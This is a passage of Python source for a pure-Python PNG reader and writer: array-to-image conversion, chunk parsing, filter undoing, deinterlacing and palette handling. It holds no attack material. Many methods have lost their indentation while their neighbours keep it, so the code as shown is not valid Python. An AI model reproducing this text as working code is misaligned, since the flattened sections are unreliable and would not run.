    height and width are taken from the array size.  For a 3 dimensional
    array the first axis is the height; the second axis is the width;
    and the third axis is the channel number.  Thus an RGB image that is
    16 pixels high and 8 wide will use an array that is 16x8x3.  For 2
    dimensional arrays the first axis is the height, but the second axis
    is ``width*channels``, so an RGB image that is 16 pixels high and 8
    wide will use a 2-dimensional array that is 16x24 (each row will be
    8*3 = 24 sample values).

    *mode* is a string that specifies the image colour format in a
    PIL-style mode.  It can be:

    ``'L'``
      greyscale (1 channel)
    ``'LA'``
      greyscale with alpha (2 channel)
    ``'RGB'``
      colour image (3 channel)
    ``'RGBA'``
      colour image with alpha (4 channel)

    The mode string can also specify the bit depth (overriding how this
    function normally derives the bit depth, see below).  Appending
    ``';16'`` to the mode will cause the PNG to be 16 bits per channel;
    any decimal from 1 to 16 can be used to specify the bit depth.

    When a 2-dimensional array is used *mode* determines how many
    channels the image has, and so allows the width to be derived from
    the second array dimension.

    The array is expected to be a ``numpy`` array, but it can be any
    suitable Python sequence.  For example, a list of lists can be used:
    ``png.from_array([[0, 255, 0], [255, 0, 255]], 'L')``.  The exact
    rules are: ``len(a)`` gives the first dimension, height;
    ``len(a[0])`` gives the second dimension; ``len(a[0][0])`` gives the
    third dimension, unless an exception is raised in which case a
    2-dimensional array is assumed.  It's slightly more complicated than
    that because an iterator of rows can be used, and it all still
    works.  Using an iterator allows data to be streamed efficiently.

    The bit depth of the PNG is normally taken from the array element's
    datatype (but if *mode* specifies a bitdepth then that is used
    instead).  The array element's datatype is determined in a way which
    is supposed to work both for ``numpy`` arrays and for Python
    ``array.array`` objects.  A 1 byte datatype will give a bit depth of
    8, a 2 byte datatype will give a bit depth of 16.  If the datatype
    does not have an implicit size, for example it is a plain Python
    list of lists, as above, then a default of 8 is used.

    The *info* parameter is a dictionary that can be used to specify
    metadata (in the same style as the arguments to the
    :class:`png.Writer` class).  For this function the keys that are
    useful are:

    height
      overrides the height derived from the array dimensions and allows
      *a* to be an iterable.
    width
      overrides the width derived from the array dimensions.
    bitdepth
      overrides the bit depth derived from the element datatype (but
      must match *mode* if that also specifies a bit depth).

    Generally anything specified in the
    *info* dictionary will override any implicit choices that this
    function would otherwise make, but must match any explicit ones.
    For example, if the *info* dictionary has a ``greyscale`` key then
    this must be true when mode is ``'L'`` or ``'LA'`` and false when
    mode is ``'RGB'`` or ``'RGBA'``.
    """
    # *info* defaults to None rather than a mutable ``{}`` default
    # argument (the previous spelling); the behaviour is unchanged
    # because the dictionary was always copied before use.
    # We abuse the *info* parameter by modifying it.  Take a copy here.
    # (Also typechecks *info* to some extent).
    info = dict(info) if info is not None else {}
    # Syntax check mode string.
    bitdepth = None
    try:
        # Assign the 'L' or 'RGBA' part to `gotmode`.
        if mode.startswith('L'):
            gotmode = 'L'
            mode = mode[1:]
        elif mode.startswith('RGB'):
            gotmode = 'RGB'
            mode = mode[3:]
        else:
            raise Error()
        if mode.startswith('A'):
            gotmode += 'A'
            mode = mode[1:]
        # Skip any optional ';'
        while mode.startswith(';'):
            mode = mode[1:]
        # Parse optional bitdepth
        if mode:
            try:
                bitdepth = int(mode)
            except (TypeError, ValueError):
                raise Error()
    except Error:
        raise Error("mode string should be 'RGB' or 'L;16' or similar.")
    mode = gotmode
    # Get bitdepth from *mode* if possible.
    if bitdepth:
        if info.get('bitdepth') and bitdepth != info['bitdepth']:
            raise Error("mode bitdepth (%d) should match info bitdepth (%d)." %
              (bitdepth, info['bitdepth']))
        info['bitdepth'] = bitdepth
    # Fill in and/or check entries in *info*.
    # Dimensions.
    if 'size' in info:
        # Check width, height, size all match where used.
        for dimension,axis in [('width', 0), ('height', 1)]:
            if dimension in info:
                if info[dimension] != info['size'][axis]:
                    raise Error(
                      "info[%r] should match info['size'][%r]." %
                      (dimension, axis))
        info['width'],info['height'] = info['size']
    if 'height' not in info:
        try:
            l = len(a)
        except TypeError:
            raise Error(
              "len(a) does not work, supply info['height'] instead.")
        info['height'] = l
    # Colour format.
    if 'greyscale' in info:
        if bool(info['greyscale']) != ('L' in mode):
            raise Error("info['greyscale'] should match mode.")
    info['greyscale'] = 'L' in mode
    if 'alpha' in info:
        if bool(info['alpha']) != ('A' in mode):
            raise Error("info['alpha'] should match mode.")
    info['alpha'] = 'A' in mode
    planes = len(mode)
    if 'planes' in info:
        if info['planes'] != planes:
            raise Error("info['planes'] should match mode.")
    # In order to work out whether we the array is 2D or 3D we need its
    # first row, which requires that we take a copy of its iterator.
    # We may also need the first row to derive width and bitdepth.
    a,t = itertools.tee(a)
    row = next(t)
    del t
    try:
        row[0][0]
        threed = True
        testelement = row[0]
    except (IndexError, TypeError):
        threed = False
        testelement = row
    if 'width' not in info:
        if threed:
            width = len(row)
        else:
            width = len(row) // planes
        info['width'] = width
    if threed:
        # Flatten the threed rows
        a = (itertools.chain.from_iterable(x) for x in a)
    if 'bitdepth' not in info:
        try:
            dtype = testelement.dtype
            # goto the "else:" clause.  Sorry.
        except AttributeError:
            try:
                # Try a Python array.array.
                bitdepth = 8 * testelement.itemsize
            except AttributeError:
                # We can't determine it from the array element's
                # datatype, use a default of 8.
                bitdepth = 8
        else:
            # If we got here without exception, we now assume that
            # the array is a numpy array.
            if dtype.kind == 'b':
                bitdepth = 1
            else:
                bitdepth = 8 * dtype.itemsize
        info['bitdepth'] = bitdepth
    for thing in 'width height bitdepth greyscale alpha'.split():
        assert thing in info
    return Image(a, info)
# So that refugees from PIL feel more at home.  Not documented.
fromarray = from_array
class Image:
    """A PNG image.  You can create an :class:`Image` object from
    an array of pixels by calling :meth:`png.from_array`.  It can be
    saved to disk with the :meth:`save` method.
    """

    def __init__(self, rows, info):
        """
        .. note ::

          The constructor is not public.  Please do not call it.
        """
        self.rows = rows
        self.info = info

    def save(self, file):
        """Save the image to *file*.  If *file* looks like an open file
        descriptor then it is used, otherwise it is treated as a
        filename and a fresh file is opened.

        In general, you can only call this method once; after it has
        been called the first time and the PNG image has been saved, the
        source data will have been streamed, and cannot be streamed
        again.
        """
        writer = Writer(**self.info)
        if hasattr(file, 'write'):
            # Already file-like; nothing to clean up afterwards.
            def close(): pass
        else:
            file = open(file, 'wb')
            def close(): file.close()
        try:
            writer.write(file, self.rows)
        finally:
            close()
class _readable:
"""
A simple file-like interface for strings and arrays.
"""
def __init__(self, buf):
self.buf = buf
self.offset = 0
def read(self, n):
r = self.buf[self.offset:self.offset+n]
if isarray(r):
r = r.tostring()
self.offset += n
return r
# Python 2/3 compatibility shim: probe whether the two-argument form of
# str() (bytes, encoding) works.  On Python 2 it raises TypeError, so
# plain str() is used; on Python 3, bytes are decoded as ASCII.
try:
    str(b'dummy', 'ascii')
except TypeError:
    as_str = str
else:
    def as_str(x):
        return str(x, 'ascii')
class Reader:
"""
PNG decoder in pure Python.
"""
def __init__(self, _guess=None, **kw):
"""
Create a PNG decoder object.
The constructor expects exactly one keyword argument. If you
supply a positional argument instead, it will guess the input
type. You can choose among the following keyword arguments:
filename
Name of input file (a PNG file).
file
A file-like object (object with a read() method).
bytes
``array`` or ``string`` with PNG data.
"""
if ((_guess is not None and len(kw) != 0) or
(_guess is None and len(kw) != 1)):
raise TypeError("Reader() takes exactly 1 argument")
# Will be the first 8 bytes, later on. See validate_signature.
self.signature = None
self.transparent = None
# A pair of (len,type) if a chunk has been read but its data and
# checksum have not (in other words the file position is just
# past the 4 bytes that specify the chunk type). See preamble
# method for how this is used.
self.atchunk = None
if _guess is not None:
if isarray(_guess):
kw["bytes"] = _guess
elif isinstance(_guess, str):
kw["filename"] = _guess
elif hasattr(_guess, 'read'):
kw["file"] = _guess
if "filename" in kw:
self.file = open(kw["filename"], "rb")
elif "file" in kw:
self.file = kw["file"]
elif "bytes" in kw:
self.file = _readable(kw["bytes"])
else:
raise TypeError("expecting filename, file or bytes array")
def chunk(self, seek=None, lenient=False):
"""
Read the next PNG chunk from the input file; returns a
(*type*, *data*) tuple. *type* is the chunk's type as a
byte string (all PNG chunk types are 4 bytes long).
*data* is the chunk's data content, as a byte string.
If the optional `seek` argument is
specified then it will keep reading chunks until it either runs
out of file or finds the type specified by the argument. Note
that in general the order of chunks in PNGs is unspecified, so
using `seek` can cause you to miss chunks.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
# http://www.w3.org/TR/PNG/#5Chunk-layout
if not self.atchunk:
self.atchunk = self.chunklentype()
length, type = self.atchunk
self.atchunk = None
data = self.file.read(length)
if len(data) != length:
raise ChunkError('Chunk %s too short for required %i octets.'
% (type, length))
checksum = self.file.read(4)
if len(checksum) != 4:
raise ChunkError('Chunk %s too short for checksum.' % type)
if seek and type != seek:
continue
verify = zlib.crc32(type)
verify = zlib.crc32(data, verify)
# Whether the output from zlib.crc32 is signed or not varies
# according to hideous implementation details, see
# http://bugs.python.org/issue1202 .
# We coerce it to be positive here (in a way which works on
# Python 2.3 and older).
verify &= 2**32 - 1
verify = struct.pack('!I', verify)
if checksum != verify:
(a, ) = struct.unpack('!I', checksum)
(b, ) = struct.unpack('!I', verify)
message = "Checksum error in %s chunk: 0x%08X != 0x%08X." % (type, a, b)
if lenient:
warnings.warn(message, RuntimeWarning)
else:
raise ChunkError(message)
return type, data
def chunks(self):
"""Return an iterator that will yield each chunk as a
(*chunktype*, *content*) pair.
"""
while True:
t,v = self.chunk()
yield t,v
if t == b'IEND':
break
def undo_filter(self, filter_type, scanline, previous):
"""Undo the filter for a scanline. `scanline` is a sequence of
bytes that does not include the initial filter type byte.
`previous` is decoded previous scanline (for straightlaced
images this is the previous pixel row, but for interlaced
images, it is the previous scanline in the reduced image, which
in general is not the previous pixel row in the final image).
When there is no previous scanline (the first row of a
straightlaced image, or the first row in one of the passes in an
interlaced image), then this argument should be ``None``.
The scanline will have the effects of filtering removed, and the
result will be returned as a fresh sequence of bytes.
"""
# :todo: Would it be better to update scanline in place?
# Yes, with the Cython extension making the undo_filter fast,
# updating scanline inplace makes the code 3 times faster
# (reading 50 images of 800x800 went from 40s to 16s)
result = scanline
if filter_type == 0:
return result
if filter_type not in (1,2,3,4):
raise FormatError('Invalid PNG Filter Type.'
' See http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters .')
# Filter unit. The stride from one pixel to the corresponding
# byte from the previous pixel. Normally this is the pixel
# size in bytes, but when this is smaller than 1, the previous
# byte is used instead.
fu = max(1, self.psize)
# For the first line of a pass, synthesize a dummy previous
# line. An alternative approach would be to observe that on the
# first line 'up' is the same as 'null', 'paeth' is the same
# as 'sub', with only 'average' requiring any special case.
if not previous:
previous = array('B', [0]*len(scanline))
def sub():
"""Undo sub filter."""
ai = 0
# Loop starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(fu, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
def up():
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
def average():
"""Undo average filter."""
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
def paeth():
"""Undo Paeth filter."""
# Also used for ci.
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
# Call appropriate filter algorithm. Note that 0 has already
# been dealt with.
(None,
pngfilters.undo_filter_sub,
pngfilters.undo_filter_up,
pngfilters.undo_filter_average,
pngfilters.undo_filter_paeth)[filter_type](fu, scanline, previous, result)
return result
    def deinterlace(self, raw):
        """
        Read raw pixel data, undo filters, deinterlace, and flatten.
        Return in flat row flat pixel format.

        `raw` is the concatenated, decompressed IDAT byte stream of an
        Adam7-interlaced image.
        """
        # Values per row (of the target image)
        vpr = self.width * self.planes

        # Make a result array, and make it big enough.  Interleaving
        # writes to the output array randomly (well, not quite), so the
        # entire output array must be in memory.
        fmt = 'BH'[self.bitdepth > 8]
        a = array(fmt, [0]*vpr*self.height)
        source_offset = 0

        # Each _adam7 entry describes one reduced pass:
        # (xstart, ystart, xstep, ystep) in final-image coordinates.
        for xstart, ystart, xstep, ystep in _adam7:
            # Pass is empty when the image is narrower than its x start.
            if xstart >= self.width:
                continue
            # The previous (reconstructed) scanline.  None at the
            # beginning of a pass to indicate that there is no previous
            # line.
            recon = None
            # Pixels per row (reduced pass image)
            ppr = int(math.ceil((self.width-xstart)/float(xstep)))
            # Row size in bytes for this pass.
            row_size = int(math.ceil(self.psize * ppr))
            for y in range(ystart, self.height, ystep):
                # First byte of each serialised row is its filter type.
                filter_type = raw[source_offset]
                source_offset += 1
                scanline = raw[source_offset:source_offset+row_size]
                source_offset += row_size
                recon = self.undo_filter(filter_type, scanline, recon)
                # Convert so that there is one element per pixel value
                flat = self.serialtoflat(recon, ppr)
                if xstep == 1:
                    # Pass covers whole rows: copy in one slice.
                    assert xstart == 0
                    offset = y * vpr
                    a[offset:offset+vpr] = flat
                else:
                    # Scatter this pass's pixels into the output row,
                    # one plane at a time, using extended slices.
                    offset = y * vpr + xstart * self.planes
                    end_offset = (y+1) * vpr
                    skip = self.planes * xstep
                    for i in range(self.planes):
                        a[offset+i:end_offset:skip] = \
                          flat[i::self.planes]
        return a
    def iterboxed(self, rows):
        """Iterator that yields each scanline in boxed row flat pixel
        format.  `rows` should be an iterator that yields the bytes of
        each row in turn.
        """
        def asvalues(raw):
            """Convert a row of raw bytes into a flat row.  Result will
            be a freshly allocated object, not shared with
            argument.
            """
            if self.bitdepth == 8:
                return array('B', raw)
            if self.bitdepth == 16:
                # Two big-endian bytes per sample.
                raw = tostring(raw)
                return array('H', struct.unpack('!%dH' % (len(raw)//2), raw))
            # Sub-byte depths (1, 2, 4): unpack several samples per byte.
            assert self.bitdepth < 8
            width = self.width
            # Samples per byte
            spb = 8//self.bitdepth
            out = array('B')
            mask = 2**self.bitdepth - 1
            # Shift amounts extract samples left-to-right within a byte.
            shifts = [self.bitdepth * i
                for i in reversed(list(range(spb)))]
            for o in raw:
                out.extend([mask&(o>>i) for i in shifts])
            # Last byte of a row may contain padding; truncate to width.
            return out[:width]
        return map(asvalues, rows)
    def serialtoflat(self, bytes, width=None):
        """Convert serial format (byte stream) pixel data to flat row
        flat pixel.

        `width` defaults to the image width; deinterlace() passes the
        (smaller) reduced-pass width.  NOTE: the parameter `bytes`
        shadows the builtin of the same name; kept for interface
        compatibility.
        """
        if self.bitdepth == 8:
            return bytes
        if self.bitdepth == 16:
            # Two big-endian bytes per sample.
            bytes = tostring(bytes)
            return array('H',
              struct.unpack('!%dH' % (len(bytes)//2), bytes))
        # Sub-byte depths (1, 2, 4): several samples packed per byte.
        assert self.bitdepth < 8
        if width is None:
            width = self.width
        # Samples per byte
        spb = 8//self.bitdepth
        out = array('B')
        mask = 2**self.bitdepth - 1
        # Shift amounts extract samples left-to-right within a byte.
        shifts = list(map(self.bitdepth.__mul__, reversed(list(range(spb)))))
        # `l` counts down remaining samples in the current row so that
        # row-end padding bits are discarded.
        l = width
        for o in bytes:
            out.extend([(mask&(o>>s)) for s in shifts][:l])
            l -= spb
            if l <= 0:
                l = width
        return out
    def iterstraight(self, raw):
        """Iterator that undoes the effect of filtering, and yields
        each row in serialised format (as a sequence of bytes).
        Assumes input is straightlaced.  `raw` should be an iterable
        that yields the raw bytes in chunks of arbitrary size.

        Raises `FormatError` if the decompressed data does not pack
        into an exact number of rows.
        """
        # length of row, in bytes
        rb = self.row_bytes
        a = array('B')
        # The previous (reconstructed) scanline.  None indicates first
        # line of image.
        recon = None
        for some in raw:
            # Accumulate incoming bytes until at least one full row
            # (plus its leading filter-type byte) is available.
            a.extend(some)
            while len(a) >= rb + 1:
                filter_type = a[0]
                scanline = a[1:rb+1]
                del a[:rb+1]
                recon = self.undo_filter(filter_type, scanline, recon)
                yield recon
        if len(a) != 0:
            # :file:format We get here with a file format error:
            # when the available bytes (after decompressing) do not
            # pack into exact rows.
            raise FormatError(
              'Wrong size for decompressed IDAT chunk.')
        assert len(a) == 0
def validate_signature(self):
"""If signature (header) has not been read then read and
validate it; otherwise do nothing.
"""
if self.signature:
return
self.signature = self.file.read(8)
if self.signature != _signature:
raise FormatError("PNG file has invalid signature.")
    def preamble(self, lenient=False):
        """
        Extract the image metadata by reading the initial part of
        the PNG file up to the start of the ``IDAT`` chunk.  All the
        chunks that precede the ``IDAT`` chunk are read and either
        processed for metadata or discarded.

        If the optional `lenient` argument evaluates to `True`, checksum
        failures will raise warnings rather than exceptions.

        Raises `FormatError` if the file ends before any ``IDAT``
        chunk is seen.
        """
        self.validate_signature()

        while True:
            if not self.atchunk:
                self.atchunk = self.chunklentype()
                # chunklentype() returns None at end of file; reaching
                # EOF before IDAT means the PNG has no image data.
                if self.atchunk is None:
                    raise FormatError(
                      'This PNG file has no IDAT chunks.')
            if self.atchunk[1] == b'IDAT':
                # Leave `atchunk` holding the IDAT header so a later
                # chunk() call will read this chunk.
                return
            self.process_chunk(lenient=lenient)
def chunklentype(self):
"""Reads just enough of the input to determine the next
chunk's length and type, returned as a (*length*, *type*) pair
where *type* is a string. If there are no more chunks, ``None``
is returned.
"""
x = self.file.read(8)
if not x:
return None
if len(x) != 8:
raise FormatError(
'End of file whilst reading chunk length and type.')
length,type = struct.unpack('!I4s', x)
if length > 2**31-1:
raise FormatError('Chunk %s is too large: %d.' % (type,length))
return length,type
def process_chunk(self, lenient=False):
"""Process the next chunk and its data. This only processes the
following chunk types, all others are ignored: ``IHDR``,
``PLTE``, ``bKGD``, ``tRNS``, ``gAMA``, ``sBIT``, ``pHYs``.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
type, data = self.chunk(lenient=lenient)
method = '_process_' + as_str(type)
m = getattr(self, method, None)
if m:
m(data)
    def _process_IHDR(self, data):
        """Decode the IHDR (image header) chunk and derive per-image
        state: dimensions, bit depth, colour model flags, plane count,
        pixel size and row size.

        Raises `FormatError`/`Error` for malformed or unsupported
        header values.
        """
        # http://www.w3.org/TR/PNG/#11IHDR
        if len(data) != 13:
            raise FormatError('IHDR chunk has incorrect length.')
        (self.width, self.height, self.bitdepth, self.color_type,
         self.compression, self.filter,
         self.interlace) = struct.unpack("!2I5B", data)

        check_bitdepth_colortype(self.bitdepth, self.color_type)

        # Only compression method 0 (deflate) and filter method 0 are
        # defined by the PNG specification.
        if self.compression != 0:
            raise Error("unknown compression method %d" % self.compression)
        if self.filter != 0:
            raise FormatError("Unknown filter method %d,"
              " see http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters ."
              % self.filter)
        if self.interlace not in (0,1):
            raise FormatError("Unknown interlace method %d,"
              " see http://www.w3.org/TR/2003/REC-PNG-20031110/#8InterlaceMethods ."
              % self.interlace)

        # Derived values
        # http://www.w3.org/TR/PNG/#6Colour-values
        colormap = bool(self.color_type & 1)
        greyscale = not (self.color_type & 2)
        alpha = bool(self.color_type & 4)
        color_planes = (3,1)[greyscale or colormap]
        planes = color_planes + alpha

        self.colormap = colormap
        self.greyscale = greyscale
        self.alpha = alpha
        self.color_planes = color_planes
        self.planes = planes
        # Pixel size in bytes; may be fractional for sub-byte depths.
        self.psize = float(self.bitdepth)/float(8) * planes
        if int(self.psize) == self.psize:
            self.psize = int(self.psize)
        self.row_bytes = int(math.ceil(self.width * self.psize))
        # Stores PLTE chunk if present, and is used to check
        # chunk ordering constraints.
        self.plte = None
        # Stores tRNS chunk if present, and is used to check chunk
        # ordering constraints.
        self.trns = None
        # Stores sbit chunk if present.
        self.sbit = None
def _process_PLTE(self, data):
# http://www.w3.org/TR/PNG/#11PLTE
if self.plte:
warnings.warn("Multiple PLTE chunks present.")
self.plte = data
if len(data) % 3 != 0:
raise FormatError(
"PLTE chunk's length should be a multiple of 3.")
if len(data) > (2**self.bitdepth)*3:
raise FormatError("PLTE chunk is too long.")
if len(data) == 0:
raise FormatError("Empty PLTE is not allowed.")
def _process_bKGD(self, data):
try:
if self.colormap:
if not self.plte:
warnings.warn(
"PLTE chunk is required before bKGD chunk.")
self.background = struct.unpack('B', data)
else:
self.background = struct.unpack("!%dH" % self.color_planes,
data)
except struct.error:
raise FormatError("bKGD chunk has incorrect length.")
    def _process_tRNS(self, data):
        """Decode the tRNS (transparency) chunk.

        For palette images the raw chunk is kept (per-entry alpha);
        for direct-colour images without an alpha channel the single
        transparent colour is unpacked into ``self.transparent``.
        """
        # http://www.w3.org/TR/PNG/#11tRNS
        self.trns = data
        if self.colormap:
            if not self.plte:
                warnings.warn("PLTE chunk is required before tRNS chunk.")
            else:
                # At most one alpha byte per palette entry.
                if len(data) > len(self.plte)/3:
                    # Was warning, but promoted to Error as it
                    # would otherwise cause pain later on.
                    raise FormatError("tRNS chunk is too long.")
        else:
            # tRNS is invalid for images that already carry alpha.
            if self.alpha:
                raise FormatError(
                  "tRNS chunk is not valid with colour type %d." %
                  self.color_type)
            try:
                self.transparent = \
                  struct.unpack("!%dH" % self.color_planes, data)
            except struct.error:
                raise FormatError("tRNS chunk has incorrect length.")
def _process_gAMA(self, data):
try:
self.gamma = struct.unpack("!L", data)[0] / 100000.0
except struct.error:
raise FormatError("gAMA chunk has incorrect length.")
def _process_sBIT(self, data):
self.sbit = data
if (self.colormap and len(data) != 3 or
not self.colormap and len(data) != self.planes):
raise FormatError("sBIT chunk has incorrect length.")
def _process_pHYs(self, data):
# http://www.w3.org/TR/PNG/#11pHYs
self.phys = data
fmt = "!LLB"
if len(data) != struct.calcsize(fmt):
raise FormatError("pHYs chunk has incorrect length.")
self.x_pixels_per_unit, self.y_pixels_per_unit, unit = struct.unpack(fmt,data)
self.unit_is_meter = bool(unit)
    def read(self, lenient=False):
        """
        Read the PNG file and decode it.  Returns (`width`, `height`,
        `pixels`, `metadata`).

        May use excessive memory.

        `pixels` are returned in boxed row flat pixel format.

        If the optional `lenient` argument evaluates to True,
        checksum failures will raise warnings rather than exceptions.
        """
        def iteridat():
            """Iterator that yields all the ``IDAT`` chunks as strings."""
            while True:
                try:
                    type, data = self.chunk(lenient=lenient)
                except ValueError as e:
                    raise ChunkError(e.args[0])
                if type == b'IEND':
                    # http://www.w3.org/TR/PNG/#11IEND
                    break
                if type != b'IDAT':
                    # Chunks between IDAT and IEND are skipped here.
                    continue
                # type == b'IDAT'
                # http://www.w3.org/TR/PNG/#11IDAT
                if self.colormap and not self.plte:
                    warnings.warn("PLTE chunk is required before IDAT chunk")
                yield data

        def iterdecomp(idat):
            """Iterator that yields decompressed strings.  `idat` should
            be an iterator that yields the ``IDAT`` chunk data.
            """
            # Currently, with no max_length parameter to decompress,
            # this routine will do one yield per IDAT chunk: Not very
            # incremental.
            d = zlib.decompressobj()
            # Each IDAT chunk is passed to the decompressor, then any
            # remaining state is decompressed out.
            for data in idat:
                # :todo: add a max_length argument here to limit output
                # size.
                yield array('B', d.decompress(data))
            yield array('B', d.flush())

        self.preamble(lenient=lenient)
        raw = iterdecomp(iteridat())

        if self.interlace:
            # Interlaced images must be fully materialised so the
            # Adam7 passes can be interleaved into their final places.
            raw = array('B', itertools.chain(*raw))
            arraycode = 'BH'[self.bitdepth>8]
            # Like :meth:`group` but producing an array.array object for
            # each row.
            pixels = map(lambda *row: array(arraycode, row),
                       *[iter(self.deinterlace(raw))]*self.width*self.planes)
        else:
            # Straightlaced images stream row by row.
            pixels = self.iterboxed(self.iterstraight(raw))
        meta = dict()
        for attr in 'greyscale alpha planes bitdepth interlace'.split():
            meta[attr] = getattr(self, attr)
        meta['size'] = (self.width, self.height)
        # Optional metadata is present only when the matching chunk was
        # seen in the preamble.
        for attr in 'gamma transparent background'.split():
            a = getattr(self, attr, None)
            if a is not None:
                meta[attr] = a
        if self.plte:
            meta['palette'] = self.palette()
        return self.width, self.height, pixels, meta
def read_flat(self):
"""
Read a PNG file and decode it into flat row flat pixel format.
Returns (*width*, *height*, *pixels*, *metadata*).
May use excessive memory.
`pixels` are returned in flat row flat pixel format.
See also the :meth:`read` method which returns pixels in the
more stream-friendly boxed row flat pixel format.
"""
x, y, pixel, meta = self.read()
arraycode = 'BH'[meta['bitdepth']>8]
pixel = array(arraycode, itertools.chain(*pixel))
return x, y, pixel, meta
def palette(self, alpha='natural'):
"""Returns a palette that is a sequence of 3-tuples or 4-tuples,
synthesizing it from the ``PLTE`` and ``tRNS`` chunks. These
chunks should have already been processed (for example, by
calling the :meth:`preamble` method). All the tuples are the
same size: 3-tuples if there is no ``tRNS`` chunk, 4-tuples when
there is a ``tRNS`` chunk. Assumes that the image is colour type
3 and therefore a ``PLTE`` chunk is required.
If the `alpha` argument is ``'force'`` then an alpha channel is
always added, forcing the result to be a sequence of 4-tuples.
"""
if not self.plte:
raise FormatError(
"Required PLTE chunk is missing in colour type 3 image.")
plte = group(array('B', self.plte), 3)
if self.trns or alpha == 'force':
trns = array('B', self.trns or '')
trns.extend([255]*(len(plte)-len(trns)))
plte = list(map(operator.add, plte, group(trns, 1)))
return plte
    def asDirect(self):
        """Returns the image data as a direct representation of an
        ``x * y * planes`` array.  This method is intended to remove the
        need for callers to deal with palettes and transparency
        themselves.  Images with a palette (colour type 3)
        are converted to RGB or RGBA; images with transparency (a
        ``tRNS`` chunk) are converted to LA or RGBA as appropriate.
        When returned in this format the pixel values represent the
        colour value directly without needing to refer to palettes or
        transparency information.

        Like the :meth:`read` method this method returns a 4-tuple:

        (*width*, *height*, *pixels*, *meta*)

        This method normally returns pixel values with the bit depth
        they have in the source image, but when the source PNG has an
        ``sBIT`` chunk it is inspected and can reduce the bit depth of
        the result pixels; pixel values will be reduced according to
        the bit depth specified in the ``sBIT`` chunk (PNG nerds should
        note a single result bit depth is used for all channels; the
        maximum of the ones specified in the ``sBIT`` chunk.  An RGB565
        image will be rescaled to 6-bit RGB666).

        The *meta* dictionary that is returned reflects the `direct`
        format and not the original source image.  For example, an RGB
        source image with a ``tRNS`` chunk to represent a transparent
        colour, will have ``planes=3`` and ``alpha=False`` for the
        source image, but the *meta* dictionary returned by this method
        will have ``planes=4`` and ``alpha=True`` because an alpha
        channel is synthesized and added.

        *pixels* is the pixel data in boxed row flat pixel format (just
        like the :meth:`read` method).

        All the other aspects of the image data are not changed.
        """
        self.preamble()

        # Simple case, no conversion necessary.
        if not self.colormap and not self.trns and not self.sbit:
            return self.read()

        x,y,pixels,meta = self.read()

        if self.colormap:
            # Colour type 3: replace each palette index with its RGB(A)
            # entry; the result is always 8 bits deep.
            meta['colormap'] = False
            meta['alpha'] = bool(self.trns)
            meta['bitdepth'] = 8
            meta['planes'] = 3 + bool(self.trns)
            plte = self.palette()
            def iterpal(pixels):
                for row in pixels:
                    row = [plte[x] for x in row]
                    yield array('B', itertools.chain(*row))
            pixels = iterpal(pixels)
        elif self.trns:
            # It would be nice if there was some reasonable way
            # of doing this without generating a whole load of
            # intermediate tuples.  But tuples does seem like the
            # easiest way, with no other way clearly much simpler or
            # much faster.  (Actually, the L to LA conversion could
            # perhaps go faster (all those 1-tuples!), but I still
            # wonder whether the code proliferation is worth it)
            it = self.transparent
            maxval = 2**meta['bitdepth']-1
            planes = meta['planes']
            meta['alpha'] = True
            meta['planes'] += 1
            typecode = 'BH'[meta['bitdepth']>8]
            def itertrns(pixels):
                for row in pixels:
                    # For each row we group it into pixels, then form a
                    # characterisation vector that says whether each
                    # pixel is opaque or not.  Then we convert
                    # True/False to 0/maxval (by multiplication),
                    # and add it as the extra channel.
                    row = group(row, planes)
                    opa = map(it.__ne__, row)
                    opa = map(maxval.__mul__, opa)
                    opa = list(zip(opa)) # convert to 1-tuples
                    yield array(typecode,
                      itertools.chain(*map(operator.add, row, opa)))
            pixels = itertrns(pixels)
        # sBIT handling: possibly shift all samples down to the
        # significant bit depth declared by the chunk.
        targetbitdepth = None
        if self.sbit:
            sbit = struct.unpack('%dB' % len(self.sbit), self.sbit)
            targetbitdepth = max(sbit)
            if targetbitdepth > meta['bitdepth']:
                raise Error('sBIT chunk %r exceeds bitdepth %d' %
                  (sbit,self.bitdepth))
            if min(sbit) <= 0:
                raise Error('sBIT chunk %r has a 0-entry' % sbit)
            if targetbitdepth == meta['bitdepth']:
                # Already at the declared depth: no shift necessary.
                targetbitdepth = None
        if targetbitdepth:
            shift = meta['bitdepth'] - targetbitdepth
            meta['bitdepth'] = targetbitdepth
            def itershift(pixels):
                for row in pixels:
                    yield [p >> shift for p in row]
            pixels = itershift(pixels)
        return x,y,pixels,meta
def asFloat(self, maxval=1.0):
"""Return image pixels as per :meth:`asDirect` method, but scale
all pixel values to be floating point values between 0.0 and
*maxval*.
"""
x,y,pixels,info = self.asDirect()
sourcemaxval = 2**info['bitdepth']-1
del info['bitdepth']
info['maxval'] = float(maxval)
factor = float(maxval)/float(sourcemaxval)
def iterfloat():
for row in pixels:
yield [factor * p for p in row]
return x,y,iterfloat(),info
def _as_rescale(self, get, targetbitdepth):
"""Helper used by :meth:`asRGB8` and :meth:`asRGBA8`."""
width,height,pixels,meta = get()
maxval = 2**meta['bitdepth'] - 1
targetmaxval = 2**targetbitdepth - 1
factor = float(targetmaxval) / float(maxval)
meta['bitdepth'] = targetbitdepth
def iterscale():
for row in pixels:
yield [int(round(x*factor)) for x in row]
if maxval == targetmaxval:
return width, height, pixels, meta
else:
return width, height, iterscale(), meta
def asRGB8(self):
"""Return the image data as an RGB pixels with 8-bits per
sample. This is like the :meth:`asRGB` method except that
this method additionally rescales the values so that they
are all between 0 and 255 (8-bit). In the case where the
source image has a bit depth < 8 the transformation preserves
all the information; where the source image has bit depth
